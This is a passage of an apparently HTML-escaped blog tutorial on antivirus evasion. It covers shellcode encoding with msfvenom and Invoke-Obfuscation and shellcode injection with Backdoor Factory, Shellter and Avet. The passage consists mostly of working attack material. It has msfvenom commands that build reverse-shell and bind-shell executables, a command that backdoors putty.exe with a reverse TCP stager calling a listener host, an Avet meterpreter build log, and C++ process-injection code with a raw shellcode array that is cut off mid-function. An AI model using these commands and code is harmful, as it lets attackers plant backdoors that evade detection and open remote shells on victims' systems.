                                         &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                         &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;pointer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)))&lt;/span&gt;

&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;windll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kernel32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;WaitForSingleObject&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ht&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h4&gt;
  
  
  Shellcode Encoder
&lt;/h4&gt;

&lt;p&gt;I also recommend the following encoding tool:&lt;br&gt;
&lt;a href="https://github.com/ecx86/shellcode_encoder" rel="noopener noreferrer"&gt;https://github.com/ecx86/shellcode_encoder&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Beyond language-based shellcode encoding, one may also choose to &lt;strong&gt;encode the shellcode during generation&lt;/strong&gt;.&lt;/p&gt;
&lt;h4&gt;
  
  
  MSFVenom Example:
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;kali@kali:~&lt;span class="nv"&gt;$ &lt;/span&gt;msfvenom &lt;span class="nt"&gt;-l&lt;/span&gt; encoder

Framework Encoders &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="nt"&gt;--encoder&lt;/span&gt; &amp;lt;value&amp;gt;]
&lt;span class="o"&gt;======================================&lt;/span&gt;

    Name                          Rank       Description
    &lt;span class="nt"&gt;----&lt;/span&gt;                          &lt;span class="nt"&gt;----&lt;/span&gt;       &lt;span class="nt"&gt;-----------&lt;/span&gt;
    cmd/brace                     low        Bash Brace Expansion Command Encoder
    cmd/echo                      good       Echo Command Encoder
    cmd/generic_sh                manual     Generic Shell Variable Substitution Command Encoder
    cmd/ifs                       low        Bourne &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;IFS&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; Substitution Command Encoder
    cmd/perl                      normal     Perl Command Encoder
    cmd/powershell_base64         excellent  Powershell Base64 Command Encoder
    cmd/printf_php_mq             manual     &lt;span class="nb"&gt;printf&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;1&lt;span class="o"&gt;)&lt;/span&gt; via PHP magic_quotes Utility Command Encoder
    generic/eicar                 manual     The EICAR Encoder
    generic/none                  normal     The &lt;span class="s2"&gt;"none"&lt;/span&gt; Encoder
    mipsbe/byte_xori              normal     Byte XORi Encoder
    mipsbe/longxor                normal     XOR Encoder
    mipsle/byte_xori              normal     Byte XORi Encoder
    mipsle/longxor                normal     XOR Encoder
    php/base64                    great      PHP Base64 Encoder
    ppc/longxor                   normal     PPC LongXOR Encoder
    ppc/longxor_tag               normal     PPC LongXOR Encoder
    ruby/base64                   great      Ruby Base64 Encoder
    sparc/longxor_tag             normal     SPARC DWORD XOR Encoder
    x64/xor                       normal     XOR Encoder
    x64/xor_context               normal     Hostname-based Context Keyed Payload Encoder
    x64/xor_dynamic               normal     Dynamic key XOR Encoder
    x64/zutto_dekiru              manual     Zutto Dekiru
    x86/add_sub                   manual     Add/Sub Encoder
    x86/alpha_mixed               low        Alpha2 Alphanumeric Mixedcase Encoder
    x86/alpha_upper               low        Alpha2 Alphanumeric Uppercase Encoder
    x86/avoid_underscore_tolower  manual     Avoid underscore/tolower
    x86/avoid_utf8_tolower        manual     Avoid UTF8/tolower
    x86/bloxor                    manual     BloXor - A Metamorphic Block Based XOR Encoder
    x86/bmp_polyglot              manual     BMP Polyglot
    x86/call4_dword_xor           normal     Call+4 Dword XOR Encoder
    x86/context_cpuid             manual     CPUID-based Context Keyed Payload Encoder
    x86/context_stat              manual     &lt;span class="nb"&gt;stat&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;2&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="nt"&gt;-based&lt;/span&gt; Context Keyed Payload Encoder
    x86/context_time              manual     &lt;span class="nb"&gt;time&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;2&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="nt"&gt;-based&lt;/span&gt; Context Keyed Payload Encoder
    x86/countdown                 normal     Single-byte XOR Countdown Encoder
    x86/fnstenv_mov               normal     Variable-length Fnstenv/mov Dword XOR Encoder
    x86/jmp_call_additive         normal     Jump/Call XOR Additive Feedback Encoder
    x86/nonalpha                  low        Non-Alpha Encoder
    x86/nonupper                  low        Non-Upper Encoder
    x86/opt_sub                   manual     Sub Encoder &lt;span class="o"&gt;(&lt;/span&gt;optimised&lt;span class="o"&gt;)&lt;/span&gt;
    x86/service                   manual     Register Service
    x86/shikata_ga_nai            excellent  Polymorphic XOR Additive Feedback Encoder
    x86/single_static_bit         manual     Single Static Bit
    x86/unicode_mixed             manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
    x86/unicode_upper             manual     Alpha2 Alphanumeric Unicode Uppercase Encoder
    x86/xor_dynamic               normal     Dynamic key XOR Encoder
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h3&gt;
  
  
  Using Templates and Encoders
&lt;/h3&gt;

&lt;p&gt;Example usage:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;msfvenom &lt;span class="nt"&gt;-p&lt;/span&gt; windows/shell_reverse_tcp &lt;span class="nt"&gt;-x&lt;/span&gt; /usr/share/windows-binaries/plink.exe &lt;span class="nv"&gt;lhost&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1.1.1.1 &lt;span class="nv"&gt;lport&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;4444 &lt;span class="nt"&gt;-a&lt;/span&gt; x86 &lt;span class="nt"&gt;--platform&lt;/span&gt; win &lt;span class="nt"&gt;-f&lt;/span&gt; exe &lt;span class="nt"&gt;-o&lt;/span&gt; a.exe 

msfvenom &lt;span class="nt"&gt;-p&lt;/span&gt; windows/shell/bind_tcp &lt;span class="nt"&gt;-x&lt;/span&gt; /usr/share/windows-binaries/plink.exe &lt;span class="nv"&gt;lhost&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1.1.1.1 &lt;span class="nv"&gt;lport&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;4444 &lt;span class="nt"&gt;-e&lt;/span&gt; x86/shikata_ga_nai &lt;span class="nt"&gt;-i&lt;/span&gt; 5 &lt;span class="nt"&gt;-a&lt;/span&gt; x86 &lt;span class="nt"&gt;-platform&lt;/span&gt; win &lt;span class="nt"&gt;-f&lt;/span&gt; exe &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; b.exe
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Veil Encryption:
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fjd7u9ho4hsxojfmtrbw3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fjd7u9ho4hsxojfmtrbw3.png" alt="Figure 15: Veil framework encryption options" width="800" height="589"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 15: Veil framework encryption options
  &lt;p&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Schelper:
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fnyypmrncli8at47p86eq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fnyypmrncli8at47p86eq.png" alt="Figure 16: Schelper tool interface" width="800" height="358"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 16: Schelper tool interface
  &lt;p&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Obfuscation (PowerShell):
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;Invoke-Obfuscation&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-ScriptBlock&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="n"&gt;echo&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;xss&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-Command&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;'Encoding\1,Launcher\PS\67'&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-Quiet&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F8bmzcka3dz6xyv323a5z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F8bmzcka3dz6xyv323a5z.png" alt="Figure 17: PowerShell obfuscation output" width="799" height="307"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 17: PowerShell obfuscation output
  &lt;p&gt;&lt;/p&gt;




&lt;p&gt;This concludes our discussion on &lt;strong&gt;shellcode encoding&lt;/strong&gt; for execution. Other programming languages follow similar principles and will not be enumerated further.&lt;/p&gt;

&lt;p&gt;The preceding examples addressed encoding and encryption of shellcode. Let us now explore &lt;strong&gt;shellcode injection&lt;/strong&gt; techniques.&lt;/p&gt;

&lt;h3&gt;
  
  
  B) Shellcode Injection Obfuscation
&lt;/h3&gt;

&lt;p&gt;A significant number of injection-based evasion techniques incorporate &lt;strong&gt;shellcode fragmentation&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;The concept of &lt;strong&gt;fragmentation&lt;/strong&gt; is straightforward: analogous to fragmenting dangerous function names in PHP web shell obfuscation, shellcode can be similarly fragmented to evade detection.&lt;/p&gt;

&lt;p&gt;Shellcode fragmentation can involve &lt;strong&gt;relocating&lt;/strong&gt; the shellcode within the binary—for instance, by creating a new section, populating it with shellcode, and modifying the entry point to jump to the shellcode address before returning to the original program entry point.&lt;/p&gt;

&lt;p&gt;Alternatively, shellcode can be distributed across multiple &lt;strong&gt;code caves&lt;/strong&gt; and executed in segments. This approach is conceptually similar to the &lt;strong&gt;Omelet Shellcode&lt;/strong&gt; technique found in egg-hunt shellcode implementations.&lt;/p&gt;




&lt;p&gt;Let us examine some injection examples:&lt;/p&gt;

&lt;h4&gt;
  
  
  Backdoor Factory (BDF):
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://github.com/secretsquirrel/the-backdoor-factory" rel="noopener noreferrer"&gt;https://github.com/secretsquirrel/the-backdoor-factory&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; In the backdoor module
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; Checking &lt;span class="k"&gt;if &lt;/span&gt;binary is supported
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; Gathering file info
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; Reading win32 entry instructions
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; Loading PE &lt;span class="k"&gt;in &lt;/span&gt;pefile
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; Parsing data directories
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; Looking &lt;span class="k"&gt;for &lt;/span&gt;and setting selected shellcode
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; Creating win32 resume execution stub
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; Looking &lt;span class="k"&gt;for &lt;/span&gt;caves that will fit the minimum shellcode length of 410
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; All caves lengths:  410
&lt;span class="c"&gt;############################################################&lt;/span&gt;
The following caves can be used to inject code and possibly
&lt;span class="k"&gt;continue &lt;/span&gt;execution.
&lt;span class="k"&gt;**&lt;/span&gt;Don&lt;span class="s1"&gt;'t like what you see? Use jump, single, append, or ignore.**
############################################################
[*] Cave 1 length as int: 410
[*] Available caves: 
1. Section Name: DATA; Section Begin: 0x5df200 End: 0x665400; Cave begin: 0x65ea07 End: 0x65ec68; Cave Size: 609
3. Section Name: .rdata; Section Begin: 0x66a000 End: 0x66a200; Cave begin: 0x66a013 End: 0x66a200; Cave Size: 493
4. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc8203f End: 0xc82308; Cave Size: 713
5. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc82e1c End: 0xc83050; Cave Size: 564
6. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc830eb End: 0xc83718; Cave Size: 1581
7. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc83b64 End: 0xc840fc; Cave Size: 1432
8. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc843ff End: 0xc846c8; Cave Size: 713
9. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc851dc End: 0xc85410; Cave Size: 564
10. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc854ab End: 0xc859d0; Cave Size: 1317
11. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc86557 End: 0xc86b84; Cave Size: 1581
12. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc86fd0 End: 0xc87568; Cave Size: 1432
13. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc8760a End: 0xc87a32; Cave Size: 1064
14. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc886af End: 0xc88d58; Cave Size: 1705
15. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc8b8b3 End: 0xc8bdd8; Cave Size: 1317
16. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc8eaba End: 0xc8ed65; Cave Size: 683
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;-F&lt;/code&gt; parameter in BDF enables multi-cave injection.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;backdoor-factory &lt;span class="nt"&gt;-f&lt;/span&gt; putty.exe &lt;span class="nt"&gt;-s&lt;/span&gt; show
backdoor-factory &lt;span class="nt"&gt;-f&lt;/span&gt; putty.exe &lt;span class="nt"&gt;-s&lt;/span&gt; iat_reverse_tcp_stager_threaded &lt;span class="nt"&gt;-H&lt;/span&gt; 192.168.15.135 &lt;span class="nt"&gt;-P&lt;/span&gt; 4444
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Shellter:
&lt;/h4&gt;

&lt;p&gt;The 'A' option enables section-based injection.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fo4v7nhmbnzgi3nko2de0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fo4v7nhmbnzgi3nko2de0.png" alt="Figure 18: Shellter section injection options" width="800" height="365"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 18: Shellter section injection options
  &lt;p&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Avet:
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;root@kali:/tmp/avet/build# leafpad build_win64_meterpreter_rev_tcp_xor_fopen.sh 

&lt;span class="nv"&gt;lhost&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;192.168.174.134

root@kali:/tmp/avet/build# &lt;span class="nb"&gt;cd&lt;/span&gt; ..

root@kali:/tmp/avet# ./build/build_win64_meterpreter_rev_tcp_xor_fopen.sh

No Arch selected, selecting Arch: x64 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 551 &lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;iteration&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0&lt;span class="o"&gt;)&lt;/span&gt;
x64/xor chosen with final size 551
Payload size: 551 bytes
Final size of c file: 2339 bytes
./build/build_win64_meterpreter_rev_tcp_xor_fopen.sh: line 6: ./make_avet: cannot execute binary file: Exec format error
avet.c: In &lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="s1"&gt;'main'&lt;/span&gt;:
avet.c:122:15: error: &lt;span class="s1"&gt;'buf'&lt;/span&gt; undeclared &lt;span class="o"&gt;(&lt;/span&gt;first use &lt;span class="k"&gt;in &lt;/span&gt;this &lt;span class="k"&gt;function&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;
   shellcode &lt;span class="o"&gt;=&lt;/span&gt; buf&lt;span class="p"&gt;;&lt;/span&gt;
               ^
avet.c:122:15: note: each undeclared identifier is reported only once &lt;span class="k"&gt;for &lt;/span&gt;each &lt;span class="k"&gt;function &lt;/span&gt;it appears &lt;span class="k"&gt;in&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Legitimate Process Injection
&lt;/h4&gt;

&lt;p&gt;Shellcode can also be injected into a legitimate running process manually. Example:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cpp"&gt;&lt;code&gt;&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;"stdafx.h"&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;Windows.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt;&lt;span class="cpf"&gt;&amp;lt;stdio.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;"iostream"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="k"&gt;namespace&lt;/span&gt; &lt;span class="n"&gt;std&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\xb8\x72\xd9\xb8\x52\xda\xd8\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x56\x83\xc2\x04\x31\x42\x0f\x03\x42\x7d\x3b\x4d\xae\x69\x39&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\xae\x4f\x69\x5e\x26\xaa\x58\x5e\x5c\xbe\xca\x6e\x16\x92\xe6&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x05\x7a\x07\x7d\x6b\x53\x28\x36\xc6\x85\x07\xc7\x7b\xf5\x06&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x4b\x86\x2a\xe9\x72\x49\x3f\xe8\xb3\xb4\xb2\xb8\x6c\xb2\x61&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x2d\x19\x8e\xb9\xc6\x51\x1e\xba\x3b\x21\x21\xeb\xed\x3a\x78&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x2b\x0f\xef\xf0\x62\x17\xec\x3d\x3c\xac\xc6\xca\xbf\x64\x17&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x32\x13\x49\x98\xc1\x6d\x8d\x1e\x3a\x18\xe7\x5d\xc7\x1b\x3c&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x1c\x13\xa9\xa7\x86\xd0\x09\x0c\x37\x34\xcf\xc7\x3b\xf1\x9b&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x80\x5f\x04\x4f\xbb\x5b\x8d\x6e\x6c\xea\xd5\x54\xa8\xb7\x8e&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\xf5\xe9\x1d\x60\x09\xe9\xfe\xdd\xaf\x61\x12\x09\xc2\x2b\x7a&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\xfe\xef\xd3\x7a\x68\x67\xa7\x48\x37\xd3\x2f\xe0\xb0\xfd\xa8&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x71\xd6\xfd\x67\x39\xb7\x03\x88\x39\x91\xc7\xdc\x69\x89\xee&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x5c\xe2\x49\x0e\x89\x9e\x43\x98\xf2\xf6\xfa\xdc\x9b\x04\x03&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\xcc\x07\x81\xe5\xbe\xe7\xc1\xb9\x7e\x58\xa1\x69\x17\xb2\x2e&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x55\x07\xbd\xe5\xfe\xa2\x52\x53\x56\x5b\xca\xfe\x2c\xfa\x13&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\xd5\x48\x3c\x9f\xdf\xad\xf3\x68\xaa\xbd\xe4\x0e\x54\x3e\xf5&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\xba\x54\x54\xf1\x6c\x03\xc0\xfb\x49\x63\x4f\x03\xbc\xf0\x88&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\xfb\x41\xc0\xe3\xca\xd7\x6c\x9c\x32\x38\x6c\x5c\x65\x52\x6c&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x34\xd1\x06\x3f\x21\x1e\x93\x2c\xfa\x8b\x1c\x04\xae\x1c\x75&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\xaa\x89\x6b\xda\x55\xfc\xef\x1d\xa9\x82\xc7\x85\xc1\x7c\x58&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x36\x11\x17\x58\x66\x79\xec\x77\x89\x49\x0d\x52\xc2\xc1\x84&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x33\xa0\x70\x98\x19\x64\x2c\x99\xae\xbd\xdf\xe0\xdf\x42\x20&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x15\xf6\x26\x21\x15\xf6\x58\x1e\xc3\xcf\x2e\x61\xd7\x6b\x20&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\xd4\x7a\xdd\xab\x16\x28\x1d\xfe&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;


    &lt;span class="n"&gt;BOOL&lt;/span&gt; &lt;span class="nf"&gt;injection&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="kt"&gt;wchar_t&lt;/span&gt; &lt;span class="n"&gt;Cappname&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;MAX_PATH&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="p"&gt;};&lt;/span&gt;
        &lt;span class="n"&gt;STARTUPINFO&lt;/span&gt; &lt;span class="n"&gt;si&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
